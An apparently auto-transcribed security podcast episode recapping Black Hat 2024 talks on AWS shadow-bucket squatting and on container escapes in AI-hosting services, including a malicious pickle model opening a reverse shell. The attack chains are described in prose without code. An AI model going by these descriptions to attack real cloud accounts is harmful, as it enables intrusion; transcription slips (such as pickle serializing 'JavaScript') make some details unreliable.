BlackHat 2024 Day 1 Recap

Episode 300 –

On this episode of the podcast, we cover our two favorite briefings from the first day at the Black Hat security conference. We start with our thoughts on "shadow resources" in cloud environments before giving an update to last week's episode with additional research into AI-as-a-Service attacks.

View Transcript

Marc Laliberte  0:00  
Hey everyone, welcome back to the 443 security simplified. I'm your host, Marc Laliberte, and joining me is Corey

Corey Nachreiner  0:06  
hacker summer camp counselor, Nachreiner, if

Marc Laliberte  0:09  
you haven't already told or seen from the charred husks, not charred, but almost demolished, husk of the Tropicana. Behind us, we are coming to you from Las Vegas during hacker summer camp, specifically the black hat and DEF CON security conferences, and today is going to be a special quick recap of just two of our favorite talks from today at Black Hat. We'll have another one coming for you tomorrow, and follow it up with a longer recap from DEF CON after the end of the weekend. Yep. So with that, let's go ahead and hack our way in, paddle

Corey Nachreiner  0:41  
our way in. It is summer camp, but there's no water here in the desert. So I guess not there is no water, and it's 105 degrees.

Marc Laliberte  0:54  
So that's day one in the raps. Corey, I guess what was your first like? Thoughts on today, the first day of black hat for 2024

Corey Nachreiner  1:02  
I don't know a good old like nostalgia, same old black hat. I guess we still have the AI buzz words this year. It seems to be AI and disinformation and state sponsored fraud. That's the big buzzwords. Probably,

Marc Laliberte  1:18  
yeah. And you mentioned, like, same old, new whatever. But one thing that stood out to me was the the keynote this year was back in the main, like arena at Mandalay Bay. The last couple years it's just been in one of the expo halls, I think because Black Hat ocean condense, yeah, one of the ocean sides, because it had gotten smaller over the past couple of years post covid. But this was our first time back in the main, giant arena. So, huge

Corey Nachreiner  1:43  
arena, how full was it? Marc? Because one thing I noticed, tons of people in the hallway. It feels like it's back, but then, I don't know if I just picked bad talks, although some had big names, I didn't. The briefings aren't quite as full. There's these huge rooms, and it's maybe 10 20% of people in there, I'd say so the

Marc Laliberte  2:04  
keynote thing was 80% full or so. That's, that's impressive, but I did notice, I think they made the briefing rooms larger than they needed to, yeah? And that's probably where it looks like it's pretty empty, like mine were, like, full, but giant rooms, or, like, not full, but had a lot of people, but giant enough rooms that it was still kind of sparse. Yeah, same for me. But I guess before we get into just like, two of our favorite talks that we saw today, I wanted to go over so every black hat starts with the keynote from Jeff Moss, the founder of Black Hat. He's

Corey Nachreiner  2:33  
never on the agenda, but he always comes out like, it's some sort of surprise. I'm like, we know you come in, moss, yeah, exactly

Marc Laliberte  2:40  
this time he showed up in like, sparkly shoes, and he made some joke about hoping to blind everyone in the audience with lasers off of them. At some point, there's

Corey Nachreiner  2:47  
no place at like, home. He needs them to be watch guard red glitter. Yeah, there

Marc Laliberte  2:51  
we go. But he talked about quite a few different things. But one thing that really stood out for me from the keynote was he was just talking about our current, like, geopolitical landscape and cyber security and how they fit together. And he had some interesting examples, just interesting, like, thought provocative things. Like, first off, you mentioned, you know, right now in the 21st century, when there's warfare, it's not just kinetic warfare, it's cyber warfare too. But there's some really interesting differences in like the blast radius and collateral damage. For that, it's like in kinetic warfare, if you shoot a plane out of the sky and it crashes into the ground, like the sky is still there and the ground is still there. It's just the plane is gone. If you sink a ship, the ship is gone, but the sea is still there. In cyber security, if you try and impact some service generally, you will affect the landscape as well, too, and also on the flip side, like the sky. Yeah, you know, it could be windy, one day hot, one day low air pressure, higher pressure. But it's generally, it's the sky. It doesn't change a whole lot. Same with the ocean. It's generally the ocean. It could be bumpy, it could be flat. Cyber security, we as like technology providers or technology consumers constantly change the environment that the warfare is being fought in, which is really interesting, if you just

Corey Nachreiner  4:09  
said, and I don't think we realized the supply chain implications of all the ecosphere we have in cyber like this was not an attack, but the crowd strike issue that happened showed how a technology issue, in the case of cyber warfare, could have huge implications across many industries that you may not even think about. So it sounds like it's similar to that exactly. I missed the keynote, unfortunately. Well,

Marc Laliberte  4:36  
I got two more tidbits for you that I want your thoughts on. The second one was he discussed the fact that there's actually, there's a lot of technology companies, and specifically cyber security companies based in Israel, because they've got a extremely strong intelligence like government intelligence apparatus and mandatory conscription, meaning a lot of people will go through that, come out, experts in their field, and go start a company and be very successful. Yeah. And on the flip side, there's a lot of development operations in Ukraine, and so now we're seeing two of these nations effectively, one directly in war, one really starting to go to war. That's causing a lot of disruption for companies that are based out of there. He gave one example of a unnamed security company that's actually at Black Hat this year, where their entire development operations was based in Kyiv. And so once that war broke out, they had to have a very frank conversation of, you know, we're not replacing you. We need to set up redundancy so that when this is done, you have a company to come back to. And his whole thing was about like, now we're having to have these difficult conversations as Unfortunately, our geopolitical landscape is part of my French kind of going to hell right now. Yeah. So the last point was in the world of cybersecurity like and just in the world of IT and services like we all use so many different applications, like our tech stack at watch guards, like 100 different applications in there, when it comes to organizations that are trying to stay neutral, like the International Red Cross, like they that specific example when, like the Russia, Ukraine war broke out, they're trying to stay neutral in this to their best of our ability. But then you look at their hosting providers, and Microsoft is clearly taking an anti Russian stance at this point, because they're under attack from Russia.

Corey Nachreiner  6:28  
So that could affect the Red Cross' infrastructure if they were doing deployments Exactly.

Marc Laliberte  6:32  
So their their infrastructure is based in the Azure Cloud, for example, and so from them like, can they stay independent if the tools and services they're using are not independent, if they actually had been swayed one way or another. And he went through, like, just, it was a thought experiment for everyone, of like, we're coming to a point where there is not going to be any independent technology company, like, at some point everyone's going to have a side on something. And what does that mean if you are trying to remain a international or a, you know, like something like the American or the International Red Cross, or, let's say, like a country that needs neutrality, like Singapore or other smaller country all the time, it's interesting, like,

Corey Nachreiner  7:18  
that's why I think you and I have talked about it in a different way. This wasn't necessarily in the keynote, but like Chinese companies, there's a lot of companies, even I like, like DJI, but because of politics and national like DJI is apparently banned now in the United States for sale because they could be affected by the Chinese government. So it's going to happen both ways. Not just, yes, there's a lot of technology companies that, you know, the Five Eyes governments and our NATO friend zone, but there's companies out there that are good products, at least on the surface, that will be in the other countries too, and it'll be interesting. And there's also

Marc Laliberte  7:55  
companies that are becoming collateral damage, if you could call it that, because of geopolitical tensions. One example he gave was, you know, China and India have been like butting heads back and forth on a lot of geopolitical issues. And so what was it a year ago, year and a half ago, India goes, Okay, what's in our tool belt? Fine. We're banning Tiktok. Take that, China. And China, this is asymmetrical, like China already bans everything, and so they can't turn around and say, oh, let's find a Indian app and ban that. And ours, no, it's a asymmetrical type of action you could take. So it was really interesting. Like, I thought that was a great keynote, great opening for the conference, and just kind of setting the playing field. Is

Corey Nachreiner  8:37  
this like the cyber punk dystopian future? Like, are we literally now is that democratic governments are crumbling, and soon the big private tech companies are going to be the new governments of the globe. Honestly, it

Marc Laliberte  8:49  
kind of feels like that. Now, you put it that way, we're definitely getting a little bit closer to that, with Microsoft and Google and Apple running the entire world and taking sides along the way. So anyways, that was the keynote. Now I think just for this short episode, we'll try and pick just one talk each for that we thought was really interesting. But we will have a recap at the end of all of hacker summers week, with maybe some more from today or other days. But I guess Corey for you first, what was an interesting talk you saw? You really like,

Corey Nachreiner  9:20  
yeah, there were so many, but some of them are technical, so I might save it for the longer recap. But one I really liked was something that was called breaching AWS accounts through shadow resources, and it was given by a team of three researchers from Aqua security. I will murder their names, but I'll try Yakir kadoka, Yakir kadkoda, Michael Kaczynski and OTEC Etos, hopefully I'm not killing those. Nailed it Aqua security, though, but basically they were talking about how a lot of AWS services create resources behind the scenes that you may not know about, and talked about ways you can actually do. Lot of different types of attacks on these AWS as services, if you know about this. So one of the first things they started with is just mentioning the AWS account ID, which is a 12 digit should be unique ID. Some people treat it as a secret, but it's actually not a secret, even in AWS docs, it says, do not consider this a secret. That's only important, because sometimes I'll talk about things like s3 buckets that are being created behind the scenes, sometimes that might have a hash, but also sometimes you can find access to them through these account IDs. In either case, I think they were building off some research that was done from cloud formation, and they showed basically, when you're creating a new cloud formation template. You're just going to use that service for the first time. You may not realize that the first time you created a template, even though you might have created s3 buckets for your own use behind the scenes, it's creating the s3 bucket for you to store that template and other resources that might be available for that service. And it's creating it in the region you're in. It's not necessarily creating it for every region. I didn't know if you wanted to add something, yeah. So

Marc Laliberte  11:08  
just real quick for the non DevOps folks, cloud formation. It's the infrastructure as code option within AWS for spinning up resources using code versus clicking through the console. And as three buckets. By now, everyone should know what it has

Corey Nachreiner  11:23  
three buckets for, for AWS. So anyways, the fact that this s3 buckets being created automatically without the user really knowing if they pay attention, was essentially the issue. And part of it's the issue is imagine if you are just creating this in one region, if a threat actor can figure out the hash for that s3 bucket or the account ID, they could go into other regions. And these s3 buckets have to have a unique name. Usually that unique hash is going to be yours. But if someone can beat you to another region and create it. It's now the only one available in that region. So basically, what this cloud formation injection attack was that they were building their research off, was they would then find different ways you might be able to find that hash. And that's not trivial, by the way. The hash is something that has like astronomical permutations for what it could be. It's

Marc Laliberte  12:21  
basically like a form of, like a UID, just condensed a little bit exactly hashed

Corey Nachreiner  12:25  
instead of and you could use the full UID if you wanted to, but the hash is what primarily works. But they found by doing a lot of crawling of GitHub, of the web, of all kinds of places. Unfortunately, people don't realize sharing. Delete their links, sometimes that they might publicly share a link that has this hash in it, and that's how they were able to find, you know, lots of different buckets that they could do this attack for. And then they would create a bucket in a new region. Now, right away, that could create a denial of service issue, because if you're an organization that created the real crowd formation set up in one region, and now you try to go into another region, by default, you would be locked out because it's not publicly available and someone else owns it. So the cloud formation, like it would construction, would fail in that region. But they also found that all you have to do is change the s3 bucket defaults to just allow public access to the bucket, and change access control to everyone, and now cloud formation wouldn't fail, but it adds your template to an attacker controlled bucket, and you could understand how everything falls down at that point. They can then use that template to start doing things like creating IAM roles. They could modify resources. They could essentially get admin if

Marc Laliberte  13:39  
you have any secrets that you have as parameters in there which you should not be doing, but some organizations still do that have they'd

Corey Nachreiner  13:45  
have that for sure. That's nuts. All kinds of Read and Write issues. But basically, that was what they built the research off of. I'm not going to go into detail for every one, but then they looked at the glue service. The same thing, create that bucket. The when you create when glue creates a new account. It will create a bucket. It places a Python script in there, and you can then inject stuff in that Python script, including having an invisible back door that will run code that you're not going to see in your logs, EMR, another service. When you create a studio, it makes a bucket that one has a Jupyter Notebook. You can modify that notebook to add any sort of JavaScript you want, so that when the victim, you know, creates that Jupiter notebook in a rear you have creates a new region, they have that Jupyter notebook where you're injecting cross site scripting, script in their their own browser. Sagemaker has one, another thing called Code. Star has one, and service catalog has issue two, which they haven't disclosed yet. They'll publish a little bit later. So the whole point is, there's a lot of services that are making these shadow resources behind the scene, and then it's just a figuring out the account ID or hash and a race condition to beat them to the regions and. Even talking like,

Marc Laliberte  15:00  
when, sorry, when we talk about race conditions, I'm usually imagining like a, you know, yeah,

Corey Nachreiner  15:04  
you're thinking I used it in a bad way. We're thinking computer CPU timing attacks that are very quick. This is a race condition you have a much higher chance of winning. If the companies, like

Marc Laliberte  15:16  
suddenly, watch guard decides they want to spin up points of presence in like US East one, you'd

Corey Nachreiner  15:21  
have to fill all is it 33 or 34 regions at once to kind of prevent this? So basically free, like, yeah,

Marc Laliberte  15:29  
effectively free if you don't have, and

Corey Nachreiner  15:31  
this is a specialized remember, this is kind of like a background as the account that you don't necessarily really know about. It's just part of where the service is storing its own local resources. And that's why they talked about the bucket monopoly attack, which is where, if they once they find that one hash, if you think about it, for each of these services, they can create 33 potentially back door s3, buckets just waiting for you to come to the region. Then you multiply this by all the service they found it in, and there's like 100 just minefields sitting there waiting for you to move to that region, and now they can do all kinds of bad stuff. And

Marc Laliberte  16:07  
bucket monopoly is like the perfect descriptor for this one. Yes,

Corey Nachreiner  16:11  
so that was fun. They had a lot of mitigations, which is AWS commands that aren't easy to share on the podcast, but we'll be sure to have links at some point, maybe in the final summary podcast, where you can find some resources. Yeah,

Marc Laliberte  16:24  
interesting. So I guess I mean trying to think of like, what you could do as a, like, DevOps administrator. In this case, I'm sure the mitigations will cover it. But like, you don't necessarily want to plan ahead and, like, set this up in every region. I wonder if, no,

Corey Nachreiner  16:38  
I that was a brute force, dumb way to do it. There was a specific command that you could do. I have a picture of it on my phone. I forget exactly what it was that would generally mitigate this from happening at all. So at the end of the day, there looks like some a console thing that you could do to protect yourself. Okay,

Marc Laliberte  16:55  
that's good. And in the meantime, though, if you are about to deploy a new stack to another region. Maybe just check a little bit beforehand to make sure that the auto generated bucket with your key thing doesn't exist. And

Corey Nachreiner  17:07  
as you're sharing, like Amazon links, just I mean, you'll see this hash show up in some links. Just think about that your account ID. While it's not supposed to be a secret, there's no reason to spread it around. So try to avoid it. And when you're sharing any sort of Amazon links in the public place, just be cognizant of the parameters, because there might be information in the parameters that gives bad guys a little bit of help to target you.

Marc Laliberte  17:32  
That's nuts. That sounds like a really good talk. The one that I really liked is actually a follow up to our episode last week, or the week before. If you remember, we were talking about research from wiz security, which I confirmed we know the pronunciation. It's Wiz, not wise. I was wrong. It

Corey Nachreiner  17:51  
was a whiz on your pronunciation of it exactly

Marc Laliberte  17:54  
now. So this one was named the same as like the article that we originally read, which was isolation or hallucination, hacking AI infrastructure for weights and profit or something. It was by two folks that I'm gonna totally Butch their names, so I'm just gonna call him helai And Ben Cezanne and try and skip those French new came out. But anyways, so it was two researchers from wiz talking about just a fun little research project. They had to look for issues in artificial intelligence as a service, or AI, as as they called it, different platforms that allow you to either run your own models in their their platform, or train your models in their platform, or really a whole bunch of services around artificial intelligence. The reason these exist, by the way, is not all of us can afford to go buy 10,000 NVIDIA GPUs and set up a GPU farm to train and run AI models, and so these service providers can offer them as a service instead. And they picked on three that they talked about in the talk. One of them is the one we chatted about on that last episode, which was sa P's AI platform as a service. But the other two were really interesting as well. So the first one is one I had heard of before the platform. It's called hugging face, which is the dumbest name. I've

Corey Nachreiner  19:16  
never heard of that correct, but so it makes me think of like the alien.

Marc Laliberte  19:20  
It's they have a cute little like emoji, like emoji hugging you as the icon for it. But despite the stupid name, it's one of the most prominent, like repositories slash like package indexes for open source AI models. Think of it like as a GitHub for AI models, where people can upload their model, some a description to show off, like, what they trained it to do. For example, when I was looking for some AI models internally for helping, like, translate weather predictions into a image generator for some image that summarizes the weather you and your cool. Background projects. This is for my stupid little like home assistant tablet. Back at home, there were some fun models in there that could, like, get some of the legwork out of the way. For me, I ended up just paying OpenAI 20 bucks a month instead and using theirs, but I was looking for the free options anyway. So hugging face. Think of it like GitHub for open source AI models, one of its features, though, is you can upload a model, and it actually exposes a way to interact with that model through their platform. So in the world of artificial intelligence, when you submit a prompt to a model and it does something and returns the result back to you, that's called inference, is the fancy word for it. And so you can do inference actions with models that are uploaded to hugging face just through their platform. And it uses like infrastructure hosted by hugging face in their cloud or application or whatever. And you might see where this could be a potential issue there. So AI models. There's a bunch of different ways to package them. One of the most popular ways is just the plain old Python pickle. If you're not familiar with Python, Python pickling, it's basically a way to serialize Python data. So serialize is taking, like the data from a script or something, and converting it into just an object you can save on your storage device or transmit across a network. And pickle is the library that can take, like a JavaScript function, a class or even just a simple like list or object, and serialize it down into a file and then load it back up into what it is Python pickle. If you go to the documentation on like page one, there's this big red box that says, Warning, do not use this on untrusted code or untrusted data, because basically anyone that gives you a pickle can gain code execution on when you deserialize it. There's a built in function called Import. It's like underscore, underscore, import, underscore, underscore, that you can set as a part of your pickle, and when the python script that's executing it tries to load it, it'll load up that function and execute whatever's in it. So what they found was, on hugging face, they can upload their own model as a pickle file. They would they, as a proof of concept, took like a legitimate model of just some AI chat bot thing. They overwrote that import function on it with a malicious function that basically said, anytime I say the word, execute this command. Execute it on the under it's not like the AI, it's just it bypasses the AI and actually runs the command on the underlying operating system. And they first tested it, they were just at a like, who am I? And saw it was running as root, which was interesting. That was exactly his words for all. That's always lovely to see that. But then they set it to set up a remote shell, which they could then use Netcat to connect back into. They basically had root access to the container that this thing was running on in hugging faces infrastructure,

Corey Nachreiner  23:00  
I assume whatever it was had a lot of resource or power

Marc Laliberte  23:03  
well, so the way that almost all of these AI as a service providers, run their models is through Kubernetes clusters. And so this was a individual container on a pod full of other containers for other people's functions in a cluster full of a whole bunch of pods, and so they had root in their one container. But right now, that was it. But what they these are

Corey Nachreiner  23:28  
right now, those are some foreboding words there, Marc.

Marc Laliberte  23:31  
So these are their seasoned cloud security experts from Wiz. And so they pulled out all their tricks that they typically use for penetration testing engagements for Kubernetes based systems, one of the first things they look for is what is like, the role attached to that container, like, what are the permissions on it? The downside was it actually didn't have a whole lot of permissions on it at all. They couldn't directly elevate that to like, access to the whole cluster. The upside from a hacker perspective, was that cluster actually had a the IMDs. It's like an administrative config file, totally visible and accessible from any containers in there. So they were able to basically query this, gain the credentials and elevate their role for their cluster. This is the 1000 foot level for how they actually did this? Basically, they were able to assume a role within their cluster that then gave them access to the entire Kubernetes cluster and everything that's running within wizzes Or not whizzes, within hugging faces, infrastructure. So the long story short, they were able to gain access, write and read access to all public and private models, including system ones that hugging face themselves run within this entire infrastructure. Crazy. That was the first one. The second one was targeting another, like similar repository called replicate. So replicate, they don't use pickles. They use their own kind of not proprietary, but custom. K. Container called a cog, and it's basically, think of it like a Docker container, but like a Docker container, like you control everything that happens in that container when it loads up and runs. And so they created a malicious container where inside there they modified the script that's responsible for loading the model that's supposed to be in there, and instead of loading that model, it just creates a remote shell and gives them access into the container when it runs, like hugging face. They got root on that container within the pod, but in this case, they actually didn't have, like, any permissions within the Kubernetes cluster itself, but they did some poking around, and they ultimately ran like netstat on there, and they found a open connection where they couldn't see the process info for it, which, long story short, this meant that their container was sharing a network namespace with another container. In this case, spoiler alert, it was the management container that was running within the same pod. Think a pod is basically just a virtual machine, and on that virtual machine you have even more tiny virtual machines running. And so that connection they found was actually a connection to a Redis server. Redis is like a think, like data store, like API thing queuing system for in this case, the services that are running on this service provider, which I already forgot their name, replicate. So through this because they had root on their server and because it shared the same network name space and that connection, that connection was already open. They didn't need to authenticate to the Redis server. They had authentication. They didn't know username and password, but they could use TCP injection and just inject arbitrary packets into this existing services, exactly which then let them effectively gain full access to that Redis server, which gave them full access to every prompt that users submitted into this platform, and the results the inference that came back from the models and so through that, read and write access, basically to any model that is running, or the ability to tamper with any other customer stuff. So those were two, like, pretty nuts ones. And like, my main takeaway from this wasn't actually like, like for AI as a service specifically, it was more like, these are some basic, maybe not basic, but important, just Kubernetes security items, where, if you're running untrusted workloads in a cluster, or like, a mixed environment, there's a lot of different ways to Break out of a container and potentially impact the entire

Corey Nachreiner  27:43  
end of the day. These aren't AI vulnerabilities, so to speak. But I would still argue, as the business side of things, AI is affecting it in that AI is a buzzword right now that can make a lot of money, people are rushing to push whatever AI based services they can at the speed of light. So it feels like this is just my take on a presentation. I didn't see that in designing AI as a service, AI as in designing that we're rushing to things like, like we always do, new to market innovation. We're forgetting security by design, and they're not paying attention to back end infrastructure security. That's, it's not new. It's, it's, I guess it is still new to some people, cloud, Docker, Kubernetes. It's more complex security than the old school on prem stuff, but it's security that is defined. And so maybe AI being rushed to market isn't a good thing, not because there's a ton of vulnerabilities in the models themselves, but all these back ends we're building without thinking about the repercussions. I think

Marc Laliberte  28:48  
that's a very good point, because AI right now it feels like a gold rush of sorts, not necessarily in terms of like everyone's gonna get a return, but everyone's trying to get a return. And going fast, you gotta go as fast as you can and potentially cut corners. And this is where this type of issue can manifest and just totally screw your entire setup. It's

Corey Nachreiner  29:08  
even hard for us as security folks at our organization, I imagine for you at yours and that AI, there's so much power to machine learning and AI that we really want to take advantage of, and we are taking advantage of but we have to remind ourselves that at least slowed down to research the right ways to do certain things, because it's easy to fall into old traps. Yeah,

Marc Laliberte  29:31  
very well said. So that was, I mean, one of, I think three talks liked, and I

Corey Nachreiner  29:36  
have a few more we can do in the summer. And one is AI related that was interesting to me. Yeah,

Marc Laliberte  29:41  
so I mean, with that, that's the end of this short recap episode. We'll have another one tomorrow, and then we'll have a larger one, probably during our normal podcast time next week. But yeah, man, good day one, and the books felt like not bad of a whirlwind. I'm looking forward to tomorrow and then, of course. Con over the weekend too.

Corey Nachreiner  30:01  
I'm sure we'll be tired by Sunday. Yeah,

Marc Laliberte  30:03  
my feet are already killing me. Hey, everyone, thanks again for listening. As always, if you enjoyed today's episode, don't forget to rate, review and subscribe. If you have any questions on today's topics or suggestions for future episode topics, you can reach out to us on Instagram or at WatchGuard underscore technologies, thanks again for listening, and you'll hear from us tomorrow

Corey Nachreiner  30:28  
or whenever we post the second day.